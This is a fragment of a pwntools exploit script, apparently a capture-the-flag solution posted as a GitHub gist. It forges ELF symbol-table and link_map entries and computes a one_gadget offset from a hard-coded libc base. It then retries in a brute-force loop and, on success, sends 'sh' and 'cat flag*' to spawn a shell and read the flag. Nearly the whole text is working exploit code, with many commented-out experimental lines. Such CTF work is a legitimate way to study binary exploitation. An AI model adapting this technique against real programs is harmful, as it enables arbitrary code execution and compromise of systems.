FAKE_SEC_SYM_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*FAKE_SYM_IDX | |
do_offset(FAKE_SEC_SYM_OFF + 0x0, FAKE_SYM_STR_OFF) | |
# fake the relocation | |
# do_bs(FAKE_RELOC_BUF_OFF+0x8, p8(7)) | |
# do_bs(FAKE_RELOC_BUF_OFF, p8(0x38)) | |
# do_bs(FAKE_RELOC_BUF_OFF+1, p8(0x40)) | |
# do_bs(FAKE_RELOC_BUF_OFF+0x8+4, p8(FAKE_SYM_IDX)) | |
ONE_GADGET = 0xebcf8 | |
TARGET_FUN = 0xEB460 | |
ONE_GADGET = 0x000000000005a49e | |
TARGET_FUN = 0x51600 | |
BASE_ADDR_DIFF = ONE_GADGET - TARGET_FUN | |
BASE_ADDR_DIFF += main_off | |
log.info("OFFSET LIBC HERE, SO THAT WE CAN CALL execl+0x%x", BASE_ADDR_DIFF) | |
LIBC_BASE_ADDR = 0x00007ffff7d8e000 | |
BASE_ADDR_NEW = LIBC_BASE_ADDR + BASE_ADDR_DIFF | |
# do_offset(LIBC_LINK_MAP_OFF, (BASE_ADDR_NEW & 0xff)) | |
# do_offset(LIBC_LINK_MAP_OFF+1, ((BASE_ADDR_NEW >> 8) & 0xff)) | |
# do_offset(LIBC_LINK_MAP_OFF, ((0xe2-0x20) & 0xff)) | |
# pause() | |
# do_brute(info_off(DT_SYMTAB), FAKE_SYMTAB_INFO_BIN_OFF-8) | |
# do_brute(info_off(DT_STRTAB), FAKE_STRTAB_INFO_BIN_OFF-8) | |
# do_brute(info_off(FAKE_SYMTAB_INFO_IDX), SYMTAB_BASE + 0x18) | |
# do_brute(info_off(FAKE_STRTAB_INFO_IDX), STRTAB_BASE + 0x2a) | |
# do_offset(info_off(DT_SYMTAB), (SYMTAB_BASE + 0x18) & 0xff) | |
# do_offset(info_off(DT_STRTAB), (STRTAB_BASE + 0x2a) & 0xff) | |
log.info("create fake symtab element") | |
GET_IMM_FAKE_SYMTAB_OFF = FAKE_SYMTAB_BUF_OFF + 0x18*GET_IMM_SYMIDX | |
fake_symtab = p32(0x89) + p8(0x12) + p8(0) + p16(0xe) + p64(0x1211) + p16(0xb) | |
# do_bs(GET_IMM_FAKE_SYMTAB_OFF, fake_symtab) | |
# 1268 | |
# do_offset(GET_IMM_FAKE_SYMTAB_OFF, 0x89) | |
# do_offset(GET_IMM_FAKE_SYMTAB_OFF+4, 10 | 0x10) | |
do_offset(GET_IMM_FAKE_SYMTAB_OFF+4, 0x12) | |
do_offset(GET_IMM_FAKE_SYMTAB_OFF+6, 0xe) | |
TARGET = 0x1054 | |
TARGET = 0x1070 | |
do_bs(GET_IMM_FAKE_SYMTAB_OFF+8, p16(TARGET)) | |
# do_bs(GET_IMM_FAKE_SYMTAB_OFF+0x10, p8(0xb)) | |
# log.info("Create fake fini element") | |
FAKE_FINI_BUF_OFF = 0x10 | |
FAKE_FINI_BIN_OFF = FAKE_FINI_BUF_OFF + BUFFER_BASE | |
# do_bs(FAKE_FINI_BUF_OFF+8, p16(0x120C)) | |
# do_brute(info_off(DT_FINI), FAKE_FINI_BIN_OFF) | |
# pause() | |
# do_bs(LINK_MAP_OFF + NEXT_OFF, b"\0"*8) | |
log.info("GOING AWAY") | |
# pause() | |
log.info("FAKE_STR @ 0x%x", FAKE_STRTAB_BUF_OFF + FAKE_SYM_STR_OFF + BUFFER_BASE) | |
try: | |
if NUM_OFFSETS < 30: | |
do_exit() | |
import time | |
io.recvuntil(b"MENU") | |
time.sleep(0.1) | |
io.sendline(b"sh") | |
time.sleep(0.1) | |
io.sendline(b"cat flag*") | |
except: | |
return io, False | |
try: | |
# io.sendline(b"1") | |
print(io.recvuntil(b"SEC").decode()) | |
except: | |
return io, False | |
return io, True | |
if args.ADD: | |
link_map_add = int(args.ADD, 0) | |
else: | |
link_map_add = 0x220 | |
if not args.LOCAL: | |
link_map_add = 0x460 | |
if args.OFF: | |
main_off = int(args.OFF, 0) | |
else: | |
main_off = 0 | |
if args.LOCAL and not args.BRUTE: | |
io, _ = do_exploit(link_map_add, main_off) | |
io.interactive() | |
else: | |
for i in range(0x20): | |
log.info("Attempt %d, add: 0x%x, off: 0x%x", i, link_map_add, main_off) | |
io, ret = do_exploit(link_map_add, main_off) | |
if ret == False: | |
try: | |
io.close() | |
except: | |
pass | |
continue | |
io.interactive() | |
# shellcode = asm(shellcraft.sh()) | |
# payload = fit({ | |
# 32: 0xdeadbeef, | |
# 'iaaa': [1, 2, 'Hello', 3] | |
# }, length=128) | |
# io.send(payload) | |
# flag = io.recv(...) | |
# log.success(flag) | |
# io.interactive() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment